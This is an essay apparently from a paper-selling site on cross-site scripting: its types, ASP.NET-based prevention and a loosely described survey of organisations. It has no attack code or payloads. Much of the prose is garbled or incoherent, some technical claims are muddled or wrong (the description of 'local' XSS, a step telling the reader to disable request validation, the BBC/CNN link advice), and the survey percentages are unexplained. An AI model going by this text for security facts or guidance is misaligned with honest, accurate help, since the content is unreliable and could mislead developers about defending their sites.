We condemn the war and support Ukraine in its struggle for democratic values.
We also encourage you to join the #StandWithUkraine movement by making a donation at this link
Cross-Site Scripting Analysis

1. Introduction to Cross-Site Scripting

There are a number of techniques used by hackers to destroy website applications. These techniques allow them to get direct access to sensitive information, such as credit card numbers, social security information or medical information. The use of cross-site scripting is mainly assumed to be among the techniques used for layer hacking. It has become necessary for website developers to develop reliable web applications that allow the delivery of a range of outputs to a number of users depending on the preferences and requirements of the user. Thus, an organization can provide the high quality of secure information to its customers and prospects (Cross & Palmer, 2007). In spite of this, websites have been found to suffer from large amounts of vulnerabilities that make organizations unable to help in controlling the practice of cross-site scripting attacks that take place against their data.

On a web page, there is both the text and HTML markup that are brought about by the server and translated by the client’s browser. The full control of the output of these pages can only be attained by websites that generate static information and images. Those that generate motion pages have full control over the manner, in which their outputs are interpreted by the client (Grossman, Fogie & Hansen, 2007). The main point is that if unwanted data have been incorporated into a dynamic page, both the web-site and the client cannot have enough evidence to know that this has taken place for the purpose to take necessary measures.

By using cross-site scripting, a malicious user can inject malicious JavaScript, active HTML or Flash into a system that is vulnerable to attacks. Then, the user is fooled when he activates the script on his appliance in order to collect information. When XSS is used, it results into compromised information, manipulated and stolen cookies, the creation of requests, which are mistaken for a valid user, and the execution of malicious codes in the system used by the client. Information is mainly transferred to a hyperlink that has malicious information transferred in the easiest way in the Internet.

When using XSS as a tool for hacking, it is possible for the attacker to formulate and distribute a customized CSS URL by incorporating the use of a browser to assess the potential response on a website (Cross & Palmer, 2007). The malicious user also needs to have an idea about HTML, JavaScript and dynamic information to be able to produce a URL that does not appear too irrelevant to attack a vulnerable website.

The most vulnerable websites to hacking are those, which pass parameters to databases. They are mainly common in login forms and password recovery forms (Grossman, Fogie & Hansen, 2007).

A typical XSS attack process involves the hacker infecting an authentic webpage with malicious scripts that are downloaded through the browser, when the client visits the webpage and activates it. A number of small variations may occur in attack patterns. However, majorly it follows the sequence of the hacker infecting the webpage with the script followed by the victim visiting the page. When the victim opens the page, the script injects something unpleasant that is not expected by the web application owner.

Usually, web developers put enough precautions to ensure that the application is protected from the first step of the attack. There will also be the need for the developer to note that the hacker is prevented from infecting the infection of the webpage by his malicious attack. A number of ways are available that can be used to accomplish this process. This paper tries to explain some techniques that web developers may find useful in preventing their webpages from being attacked by hackers. Another related topics explained by this paper are types of threats that webpages are likely to face during their operations (Grossman, Fogie & Hansen, 2007). This paper also involves research on the manner, in which some organizations and web developers ensure that they prevent their websites from being attacked by the use of XSS scripting. Then, it reports the findings of the research and gives recommendations how to prevent attacks of webpages by developing the best ways to be used by web developers. In the literature review, it seeks to explain some methods that have been used previously to prevent attacks of we- sites. It further explains how they have been used successfully in such applications.

2. Literature Review

The use of Java Script is popular in the development of rich web applications. The web applications dynamic nature, such as Google, Maps and Yahoo, is made possible by the client-side execution of codes written in the form of HTML and HTML pages. By making a system more complex, there is a likelihood of potential security threats similar to connecting JavaScript to the webpage. A number of problems are likely to be caused by the use of JavaScript on the webpage. The difficulty is that a malicious website is likely to use JavaScript to do modifications in the local CMS by deleting or copying information. In addition, a malicious website may use JavaScript to track an activity in the system, for instance, with keystroke logging. Furthermore, it may use JavaScript to communicate with other websites that the user is currently using with other tabs or windows prospects (Cross & Palmer, 2007).

The problems above can be mitigated in a number of ways. For instance, the mitigation of Java Scripts, which contribute to changes in the local system, can be achieved by making the browser a sort of a sandbox that provides few privileges to JavaScript in its working methods. This can be done by making it work only within the domain of the browser. The problem of the interaction with other websites can be just reduced, but the problem is usually not tremendously significant, since the interaction of a webpage with another page is not an effect that can be limited by the software that is used by the end client. In addition, the capability of one site’s JS (JavaScript) to get data intended for another site may be a factor of carefulness of the website developer.

The defining factor in cross-site scripting is explained by the fact that the capabilities of a particular dynamic website components are likely to contribute to people getting the chance to apply JavaScript for the purpose of security. The reason behind the use of the name ‘cross-site’ is the fact that it uses an association between a numbers of websites to accomplish certain objectives. Usually, despite the existence of JavaScript, the site under the threat of being attacked by the exploitation of cross-site scripting practices does not need to use JavaScript.

2.1 Cross-Site Scripting Vulnerabilities          

Majorly, there are three types of cross-site scripting. However, research has been conducted into the existence of other types of XSS. However, it should be noted that the use of webpage vulnerabilities is only concerned with three types of vulnerabilities. There might be other serious vulnerabilities that have not been discovered yet, but they are becoming exceedingly disturbing to web application owners and web developers.

There are the following forms of cross-site scripting:

  • Reflected

It has been concluded that this is the most frequent form of cross-site scripting. This type of website exploit affects vulnerabilities that take place in websites that have their info submitted by clients. It also affects data and immediately transforms them into a form, which is referred back to the web browser found in the user system. An attack is considered successful if it has the ability to send codes to the server that is a part of the webpage and returns results to the server that is found in the browser. The working principle of this vulnerability implies that sending the results, which are coded, cannot be encoded by HTML peculiar character encoding. This results into its being performed by the web browser instead of being shown as inert visible information client (Grossman, Fogie & Hansen,2007).

This exploit can be made use of by making a link using a malformed URL to ensure that a variable passed in the URL that should be conveyed to the page that has a malicious code. A vulnerability attack can be as easy as another URL being used by the server-side code to generate links on the page. It can also be  user’s account information that is incorporated into the text page to ensure that the ability of the user is determined by the name.

  • Stored

They are also known as injection attacks of HTML, and preserved in the form of cross-site scripting exploits, whereby some information sent to the server is preserved specifically in databases for the purpose of being used in the formation of sites developed for the creation of fresh pages that will be effective, when used by clients in the web applications. It is a form of cross-site scripting that has the ability to affect anyone entering sites that are subject to a store cross-site scripting vulnerability. A typical illustration of this kind of vulnerability is such content management operating system as forums of bulletin systems that are sued to enable raw XHTML and HTML to edit their information client (Grossman, Fogie & Hansen, 2007).

Just like preventing reflected exploits, a website can be successfully secured from stored exploits by ensuring that almost the entire submitted information is transformed into a display form before it is displayed. This prevents it from being understood by an interpreter as a code.

  • Local

This type of cross-site scripting damage aims to attack vulnerabilities found in the code of a webpage. Such vulnerabilities are caused by the use of the document Object Model without caution in JavaScript so that when another webpage is open with a malicious JavaScript code, it concurrently may result in the alteration of the code on the initial page of the local system. Internet explorers of older forms used on local web application pages that are found in the computer system rather than downloaded from the Internet prospects (Cross & Palmer, 2007). Through these system pages, they can break away from the browser ‘sandbox’ to bring about an effect on the entire system and enable privileges of the user to be applied in running the system.

Because of the fact that MS application software is focused on running all its programs based on the account of the administrator, this practically implies that cross-site scripting focuses on damaging MS Windows prior to the introduction of mitigation measures by using XP Service Pack 2.

In a normal cross-site scripting exploit, different from reflected or stored exploits, there is no coding of a malicious code to the server. The exploit process occurs in the available client system despite its effects on changing pages availed by another less vulnerable website prior to their interpretation by the browser to ensure that their behaviors are in compliance with the page carrying a malicious payload to the user from the server. This is an implication that server-side security measures ensure filtering and preventing the entry of malicious cross-site scripting does not find a way to exploit the software.

2.2. Methods of Preventing Cross-Site Scripting

The function of cross-site scripting is to attack vulnerabilities in a web application by inserting scripts from the client into the script code. The script code then embeds itself into response information that is transferred back to the user. The browser used by the client starts up the script code. Because of the trustworthy of the channel, from which the user downloads the script code, the browser does not have the capacity to recognize the script code as illegitimate. An example of a browser that does not offer defense is the Microsoft Explorer security zone. The most earnest consequences of cross-site scripting occur in conditions, when the attacker writes a script to obtain an identification cookie that enables him to get access to a particular valid site. This follows the process by posting the cookie to the web address (Cross & Palmer, 2007). Therefore, the attacker has the ability to imitate the identity of the user and have easy access to the trusted site. There are certain vulnerabilities of a web application, when it is likely to be attacked by cross-site scripting. These include the lack of constraint and validation of input, the lack of encoding of output and trusting the information obtained from a shared information bank.

There are certain guidelines that are followed during the cross-site scripting process constraining the input and encoding the output. In constraining the input, it is recommended that the user should start with the assumption that the input is malicious. This is followed by validating the input length, type, range and format. Constraining inputs, such as those fed through server controls, is done using ASP.NET validator controls, such as Range Validator. Constraining inputs, such as those supplied to the HTML client-side input system, or those from such sources as query strings and cookies require the use of System.Text.Regular.Expressions kind of server to determine expected attacks from scripts. In encoding the output, it is recommended that the user should use Http Utility. The following are steps involved in the prevention of cross-scripting attacks from taking place. The first step is to ensure that ASP.NET request validation is activated. Usually, the request validation of a machine is enabled. It is necessary to ensure that validation is presently enabled in the server’s machine file, and also that the application is not going against the rules of an organization. Request validation can be also disabled on the page  (Cross & Palmer, 2007). It is necessary that you do not bar this feature by using your pages. The purpose of disabling this feature may be caused for the purpose to eliminate a free-format. Formatting the text entry field developed to get HTML texts ranges as the main form of input. Thus, it is recommended that an ASP.NET page should be created to ensure that validation requests are a disabled client (Grossman, Fogie & Hansen,, 2007). After this has been done, the page is run and then rendered and passed through as client-side scripting. The validation request is then set as ‘true’ or removed from the attribute page and the page is browsed again.

The next step involves writing ASP.NETHTML as output in many ways followed by searching pages to determine the location of the feedback of URL and HTML to the client.

It is also required to know whether HTML output has input parameters. The design and page are analyzed to find if the output has any input parameters. These parameters can be obtained from a range of sources, including form fields, databases, query strings, and data access code methods. The analysis of the source code can also be reinforced by carrying out easy tests by writing a text like ‘XYZ’ in form fields to determine what the output will be. In case the browser can display ‘XYZ’ on viewing the HTML source, it can be concluded that the web application is susceptible to cross-site scripting.

The next step involves reviewing any unsafe HTML attributes and tags. If a person creating tag attributes and HTML tags uses unsafe input, it is ensured that the HTML will encode tag attributes prior to writing them out. While there is a range of HTML tags, some of them may enable a malicious client to include applet, body, frame, embed, html, style, layer and object (Grossman, Fogie & Hansen, 2007). Malicious users usually use such HTML attributes as ‘style’ in connection with the first tags to activate cross-site scripting.

The next step involves the evaluation of countermeasures. This starts when ASP.NET code is found being able to develop HTML using single input. There is a necessity to determine the right amount of countermeasures for a particular application. These countermeasures may be Encode URL output, Encode HTML output and Filter User input.

A number of additional approaches exist apart from the techniques that have been mentioned above in ensuring safeguarding in order to eliminate cross-site scripting. They include setting correct character coding, not relying on input processing and the use of inner text property rather than inner HTML.

During the process of setting correct character coding, successful restriction of data for webpages can be achieved by limiting methods, by means of which input information can be presented. As a result, malicious users are prevented from using multi-byte escape procedures and canonization that trick input validity procedures. The use of a multi-byte escape order ensures manipulating character encodings, including uniform translation, using a range of byte procedures to represent characters, not classified as ASCII types. An exploitable security hole may be created when some illegitimate byte orders are gotten by some UTF decoders (Grossman, Fogie & Hansen, 2007). Through the use of ASP.NET, you can specify the angle, at which the character is set at the level of application or the page level by applying the use of ‘globalization’ element in the configuration of the web-file.

3. Research Methodology

3.1 Participants in the Research

The research process involves the collection of information regarding web application problems brought about by cross-site scripting from a number of companies that own websites. People involved in this research are a research sponsor, a steering committee, end user representatives, a project manager and professionals in the field of cross-site scripting. The aim of the project was to ensure that it was well-sponsored and met financial obligations, when the research was conducted. He also ensured that the required facilities for conducting the research were available. The steering committee provided guidance based on its conversance with conditions in these organizations for people to be given responsibilities, such as conducting interviews and to be in charge of the allocation of funds and the manner of expenditure. End user representatives included website clients, such as customers of these companies, who provided the research team with problems they encountered as a result of cross-site scripting. The project manager’s role was to ensure that the research was carried out with the aim of establishing the effects of cross-site scripting on the performance of web applications. The project manager was also tasked to provide specialized arrangement for the collection of facilities to be used during the research. The role of professionals in the field of cross-site scripting was to explain difficult problems to the research team regarding the attacks on web applications caused by malicious users. They provided explanations for answers provided by end users.

3.2 Methods of Data Collection

One of the methods used for data collection is an interview, during which website administrators in sample companies were asked to identify if their websites had been ever attacked by malicious web users. They were also asked to give examples of some ways, in which they responded to these problems. They were then asked to explain how the phenomenon of web hacking had affected the reputation of their companies.

In another research, a survey was conducted on  sample companies, where web administrators were required to fill in questionnaires that contained questions regarding the seriousness of malicious web use in their organizations. Questions were open-ended, and respondents were allowed to answer the questions as they wished.

The results of the research were then analysed by determining the frequency of the occurrence of cross-site scripting, and methods that were mainly used to correct these web hacking processes.

The results of the research were used to provide recommendations on the way, in which website owners should tackle the issue of cross-site scripting in order to maintain the secrecy and reputation of their companies.


4.1 Various Problems Caused by Cross-Site Scripting

It has been found that the effects of cross-site scripting are of various degrees of occurrence. Based on sampling tests carried out in organizations under survey, the following table illustrates the level of the occurrence of various effects of scripting.

Compromise of data integrity              40%

Existence of cookies                           30%

Interception of user input                    20%

Execution of malicious scripts               10%

4.2.The Most Popular Methods Used to Control Website Scripting by Organizations

Most organizations interviewed reported that they prevented the problem of website scripting by encoding output on the basis of input parameters for memorable characters. The experts explained that this approach could be successful, when dealing with information that was not validated, when it was under feeding into the system. A malicious script can be prevented from executing by using such techniques as URL Encode and HTML Encode.

Another popular method preventing malicious web attacking is filtering input parameters for specific characters. The experts explained that this was achieved by removing all or a number of input characters from the script. These are characters that are salient in the generation of a script in the HTML stream. Such characters may be <, >, %, (, and &.

5.0 Conclusions and Recommendations

A vendor of web applications is recommended to develop the culture of not trusting user input and ensuring that metacharacters are filtered. The existence of the XSS hole can cause disastrous consequences to your business if not eliminated. Malicious users usually disclose such holes, which may result in eroding the confidence of the public in the privacy or security of an organization’s site.

Users also need to protect themselves by means of following links from websites they intend to view. For instance, a person using a site may link to BBC through that site instead of logging onto CNN through its main site and use the search engines of that site to find the content of BBC. This is what may prevent a large percentage of the problem. Occasionally, XSS can be executed automatically, when an e-mail or a bulletin board post is open. Those, who intend to read e-mails or a public board on websites they do not know, should be careful. The best way of protecting oneself is to turn off JavaScript in the browser settings (Jeremiah, G & Seth, F, 2007). There have been a number of cases, when cross-site scripting is found on we sites and a lot of publicity has been raised. If cross-site scripts are not prepared, a malicious attacker may discover a way to the company’s website and publish a warning about the company. The result is that the reputation of the company may be compromised by being viewed as non-sensitive to security issues (Cross & Palmer, 2007). This may send messages to clients that the company is less serious about issues that arise. This becomes a trust issue. Because of the lack of trust by your clients, they will be uncooperative in dealing with you.

Order now

Related essays